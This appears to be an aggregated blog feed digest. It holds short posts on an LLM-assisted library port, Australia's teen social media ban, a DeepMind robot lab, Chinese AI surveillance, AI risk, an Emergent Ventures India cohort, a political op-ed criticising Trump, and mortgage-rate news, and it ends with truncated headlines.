We are now at eight prompts total, running for just over four hours, and I've decorated for Christmas and watched Wake Up Dead Man on Netflix.

According to Codex CLI:

Token usage: total=2,089,858 input=1,464,295 (+ 97,122,176 cached) output=625,563 (reasoning 437,010)

My llm-prices.com calculator estimates that at $29.41 if I were paying for those tokens at API prices, but they were included in my $20/month ChatGPT Plus subscription, so the actual extra cost to me was zero.

What can we learn from this?

I'm sharing this project because I think it demonstrates a bunch of interesting things about the state of LLMs in December 2025.

  • Frontier LLMs really can perform complex, multi-hour tasks with hundreds of tool calls and minimal supervision. I used GPT-5.2 for this but I have no reason to believe that Claude Opus 4.5 or Gemini 3 Pro would not be able to achieve the same thing - the only reason I haven't tried is that I don't want to burn another 4 hours of time and several million tokens on more runs.
  • If you can reduce a problem to a robust test suite you can set a coding agent loop loose on it with a high degree of confidence that it will eventually succeed. I called this designing the agentic loop a few months ago. I think it's the key skill to unlocking the potential of LLMs for complex tasks.
  • Porting entire open source libraries from one language to another via a coding agent works extremely well.
  • Code is so cheap it's practically free. Code that works continues to carry a cost, but that cost has plummeted now that coding agents can check their work as they go.
  • We haven't even begun to unpack the etiquette and ethics around this style of development. Is it responsible and appropriate to churn out a direct port of a library like this in a few hours while watching a movie? What would it take for code built like this to be trusted in production?

I'll end with some open questions:

  • Does this library represent a legal violation of copyright of either the Rust library or the Python one?
  • Even if this is legal, is it ethical to build a library in this way?
  • Does this format of development hurt the open source ecosystem?
  • Can I even assert copyright over this, given how much of the work was produced by the LLM?
  • Is it responsible to publish software libraries built in this way?
  • How much better would this library be if an expert team hand crafted it over the course of several months?

Tags: html, javascript, python, ai, generative-ai, llms, ai-assisted-programming, gpt-5, codex-cli

Australia's ban on social media use by teens under sixteen

Australia has put into effect a ban on social media use by teenagers younger than 16. My first thought is, good luck with that...

Here are some headlines that caught my eye:

From MSN: 

Australian leader defends social media ban as teens flaunt workarounds  by Byron Kaye 

"A day after the law took effect with bipartisan support from the major political parties and backing by some three-quarters of Australian parents, the country's social media feeds were flooded with comments from people claiming to be under 16, including one on the prime minister's TikTok account saying "I'm still here, wait until I can vote".


And (more optimistically) from Nature:

Australia’s world-first social media ban is a ‘natural experiment’ for scientists
Researchers will study the effects of the policy on young people’s mental health, social interactions and political engagement.   By Rachel Fieldhouse & Mohana Basu 

" Many teenagers in the country are furious, but for social scientists, the policy offers a natural experiment to study the effects of social-media restrictions on young people." 


And this:

Social Media Lab Appointed as Lead Academic Partner for Australian Legislation 

Robot Lab

Google DeepMind is going to build a materials science lab in the UK, manned by robots and humans:

To help turbocharge scientific discovery, we will establish Google DeepMind’s first automated laboratory in the UK in 2026, specifically focused on materials science research. A multidisciplinary team of researchers will oversee research in the lab, which will be built from the ground up to be fully integrated with Gemini. By directing world-class robotics to synthesize and characterize hundreds of materials per day, the team intends to significantly shorten the timeline for identifying transformative new materials.

This is a very big deal. Gemini won’t just read papers. It will design the experiments, run the experiments, learn from the successes and failures, and then recursively improve. It’s an attempt to learn the game of materials science the same way AlphaGo learned the game of Go.

The post Robot Lab appeared first on Marginal REVOLUTION.

Chinese Surveillance and AI

New report: “The Party’s AI: How China’s New AI Systems are Reshaping Human Rights.” From a summary article:

China is already the world’s largest exporter of AI-powered surveillance technology; new surveillance technologies and platforms developed in China are also not likely to simply stay there. By exposing the full scope of China’s AI-driven control apparatus, this report presents clear, evidence-based insights for policymakers, civil society, the media and technology companies seeking to counter the rise of AI-enabled repression and human rights violations, and China’s growing efforts to project that repression beyond its borders.

The report focuses on four areas where the CCP has expanded its use of advanced AI systems most rapidly between 2023 and 2025: multimodal censorship of politically sensitive images; AI’s integration into the criminal justice pipeline; the industrialisation of online information control; and the use of AI-enabled platforms by Chinese companies operating abroad. Examined together, those cases show how new AI capabilities are being embedded across domains that strengthen the CCP’s ability to shape information, behaviour and economic outcomes at home and overseas.

Because China’s AI ecosystem is evolving rapidly and unevenly across sectors, we have focused on domains where significant changes took place between 2023 and 2025, where new evidence became available, or where human rights risks accelerated. Those areas do not represent the full range of AI applications in China but are the most revealing of how the CCP is integrating AI technologies into its political control apparatus.

News article.

Two more notable books from 2025

Ken Belson, Every Day is Sunday: How Jerry Jones, Robert Kraft, and Roger Goodell Turned the NFL into a Cultural & Economic Juggernaut.

Tom McTague, Between the Waves: The Hidden History of a Very British Revolution 1945-2016.

Both are excellent. I didn’t read the first one right off, because I do not care very much about the topic. The book is good enough to overcome that problem. I did not read the second one right off because I care about the topic a lot, but thought I already knew enough about it. The book is good enough to overcome that problem.

The post Two more notable books from 2025 appeared first on Marginal REVOLUTION.

Noah Smith on AI existential risk

Superintelligent AI would be able to use all the water and energy and land and minerals in the world, so why would it let humanity have any for ourselves? Why wouldn’t it just take everything and let the rest of us starve?

But an AI that was able to rewrite its utility function would simply have no use for infinite water, energy, or land. If you can reengineer yourself to reach a bliss point, then local nonsatiation fails; you just don’t want to devour the Universe, because you don’t need to want that.

In fact, we can already see humanity trending in that direction, even without AI-level ability to modify our own desires. As our societies have become richer, our consumption has dematerialized; our consumption of goods has leveled off, and our consumption patterns have shifted toward services. This means we humans place less and less of a burden on Earth’s natural resources as we get richer…

I think one possible technique for alignment would give fairly-smart AI the ability to modify its own utility function — thus allowing it to turn itself into a harmless stoner instead of needing to fulfill more external desires.

And beyond alignment, I think an additional strategy should be to work on modifying the constraints that AI faces, to minimize the degree to which humans and AIs are in actual, real competition over scarce resources.

One potential way to do this is to accelerate the development of outer space. Space is an inherently hostile environment for humans, but far less so for robots, or for the computers that form the physical substrate of AI; in fact, Elon Musk, Jeff Bezos, and others are already trying to put data centers in space.

Here is the full post.

The post Noah Smith on AI existential risk appeared first on Marginal REVOLUTION.

Emergent Ventures India, 14th cohort

Avani Agarwal, 18, high school senior, received her grant for Synthera, to accelerate personalized medicine using AI-powered drug discovery.

Sushan Bhattarai received his grant to map archaeological sites linked to the Khasa-Malla kingdom across the Himalayas.

Utkrisht Singh Chauhan, 19, and Yash Chavan, 22, received their grant for InTacht, to speed up and reduce costs for edge and private AI systems.

Tanuj Pandya, 20, received his grant to build gloves bringing realistic touch to XR devices.

Dhanush Bakthavatchalam, 24, received his grant to build fully automated AI-driven factories for metal fabrication.

Rashi Bhavsar received her grant for Algaevity, to develop an all-natural, zero-electricity mosquito-killing bio-device.

Rounak Banerjee received his grant to develop affordable technology for converting standard wheelchairs into electric wheelchairs.

Vasisht Dilip received his grant for Seric Steel, to turn iron ore mining waste and crop residue into steel without fossil fuels.

Mohammad Mahean Hasan, 22, studying at Minerva University, received his grant for travel and general career development.

Syed Irfan Ahmed received his grant to develop non-invasive devices monitoring posture in real time.

Kumari Anushka, 20, received her grant for RAD-Scan, to build a citizen-led biomarker testing system for radiation and heavy metal exposure.

Prince Rawat, 19, received his grant for Falken Aerospace, to build autonomous cargo UAVs for logistics.

Joy Agrawal, 19, sophomore at University of Chicago, received his grant for general career development.

Nikhil Kashyap, 20-year-old high school dropout, received his grant to build an affordable robotics kit and visual coding platform making STEM education accessible across India.

Ansh Saxena, 21, received his grant for Aquanode, to build an AI-native cloud helping teams deploy and train models with lower costs.

Mateo Escalante, 24, received his grant for Horus Prosthetics, to develop machine learning models generating perfectly fitting prosthetic leg sockets.

Dhruv Bathla, founder of Ezbeat, received his grant to build a copilot preventing cardiovascular disease through early risk identification.

Rishi Rathi, 25, received his grant to develop a marine carbon dioxide removal solution.

Those unfamiliar with Emergent Ventures can learn more here and here. The EV India announcement is here. More about the winners of the EV India second, third, fourth, fifth, sixth, seventh, eighth, ninth, tenth, eleventh, twelfth, and thirteenth cohorts. To apply for EV India, use the EV application, click the “Apply Now” button and select India from the “My Project Will Affect” drop-down menu.

And here is Nabeel’s AI engine for other EV winners. Here are the other EV cohorts.

If you are interested in supporting the India tranche of Emergent Ventures, please write to me or to Shruti at srajagopalan@mercatus.gmu.edu.

The post Emergent Ventures India, 14th cohort appeared first on Marginal REVOLUTION.

It’s Trump’s Derangement

Trump’s Cruelty After Mass Shootings Shows How Far We’ve Fallen

The awful feelings from this week’s mass shootings and the twin murders of Rob and Michele Reiner come in waves.

The feelings mix despair and frustration for a society that accepts violence — even loss of life — as an acceptable trade-off for ideological alignment and personal anger.

It happens that our family is from Providence and we both attended Brown, so the television images were unusually familiar. Bondi Beach may be a half world away, but attacks on Jews are not new for us. And like many, we’ve held Reiner in a certain shared respect for his work in film and politics.

Unfortunately, these shootings are not so different from violence a year ago on the campus of Florida State University, where our younger daughter teaches in the dance faculty. The Australian antisemitism matches attacks on a Pittsburgh synagogue and calls of hate in the streets and on the internet.

The frustration is that unending mass killings don’t prompt successful gun limitations, and that despite thoughts and prayers, we refuse to shun hate and its carriers. Indeed, I had not planned to write about these incidents, which we are following closely, because the shared revulsion is widespread.

What changed that were postings and remarks by Donald Trump, who posted that the blame for the Reiner killings is the Reiners’ Trump Derangement Syndrome.

No Empathy for Non-Loyalists

Somehow this egocentric autocrat whom we have chosen to be the most powerful man in the country is showing us that for him, only those who agree with his politics, who accept his leadership as flawless, are worthy of his otherwise empty powers of empathy.

Even as Republicans have started speaking out to say Trump’s remarks were both inhumane and cruel, Trump doubled down to add that he did not like Reiner’s politics. For that matter, Trump isn’t exactly in love with universities, including Brown. And despite his protestations about antisemitism, Trump’s support for white Christian nationalism has been a source of serious discomfort for Jews.

There is plenty of derangement syndrome to go around. It turns out that it is Trump who is deranged.

Who besides Trump can’t find empathy for a couple apparently stabbed to death by their own son, as Los Angeles officials have alleged? How devoid of recognizably human feelings is Trump? How is this Trump, scion of cruelty, a “leader” worth our respect, even apart from any of his policies?

How have we so walked away from “character” and “morality” in leadership to normalize Trump’s public behaviors?

If this is how Trump acts in a situation that just requires a moment of basic human solemnity, why should anyone be surprised about ordering the killing of shipwrecked smuggling survivors, or wrenching children from deportable migrant parents, or insisting that it’s perfectly fine to double and triple health insurance costs?

Students ought to be able to expect to attend classes without fear of mass killers. People should expect to celebrate religious and ethnic rites without worry about snipers. Parents ought not expect to be stabbed to death by their children.

Unless you’re Donald Trump, it has nothing to do with one’s political outlook.



The post It’s Trump’s Derangement appeared first on DCReport.org.

Tuesday: Employment Report, Retail Sales

Mortgage Rates
From Matthew Graham at Mortgage News Daily: Mortgage Rates Slightly Lower as Volatility Risks Increase
Mortgage rates were just slightly lower to start the new week. This leaves the average lender's top tier 30yr fixed rate almost dead center in the narrow range that's been intact since early September. ... If unemployment comes in lower than expected, rates would likely face upward pressure, potentially challenging the upper boundary of the recent range. On the other hand, a weaker/higher result should keep rates well within the range, perhaps near the lower boundary. [30 year fixed 6.29%]
emphasis added
Tuesday:
• At 8:30 AM ET, Employment Report for November.   The consensus is for 50,000 jobs added, and for the unemployment rate to be unchanged at 4.4%.

• Also at 8:30 AM, Retail sales for October will be released.  The consensus is for a 0.3% increase in retail sales.

Stars are forming in the Soul of the Queen of


High Wind Impacts in the Plains and Central Rockies; Another Atmospheric River in the Pacific Northwest